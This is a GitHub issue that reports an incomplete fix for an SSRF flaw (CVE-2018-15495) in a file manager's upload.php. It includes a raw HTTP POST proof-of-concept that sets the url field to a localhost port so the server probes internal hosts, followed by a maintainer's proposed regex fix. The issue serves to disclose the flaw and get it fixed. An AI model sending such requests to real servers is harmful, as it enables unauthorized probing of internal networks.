Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SSRF not been fully fixed in upload.php #506

Open
donot-wong opened this issue Oct 30, 2018 · 1 comment

Comments

Projects
None yet
2 participants
@donot-wong
Copy link

commented Oct 30, 2018

In upload.php we can download a pic in remote server. code in line 68~91。
Jul 27, 2018 commit a fix to limit url in order to prohibit ssrf vuln
CVE-2018-15495
but the fix only check the parm url startwith http:// or https://
we still can use http protocol to Probe intranet and attack intarnet server。For Example:
`POST /filemanager/upload.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9gov40jg57e4bo2olu5rqr8oc0; login=76a61a8504394f9c08ec4d7d747d3377
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

fldr=test/&url=http://127.0.0.1:2233/aaaaaaa`
and when the port is open will response {"error":"Invalid URL"}

ssrf

@trippo

This comment has been minimized.

Copy link
Owner

commented Nov 7, 2018

If you edit the regex with:

$urlPattern = '/^(https?://)?([\da-z.-]+.[a-z.]{2,6}|[\d.]+)([/?=&#]{1}[\da-z.-]+)*[/?]?$/i';

it's possible to block the SSRF attack I'm right?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.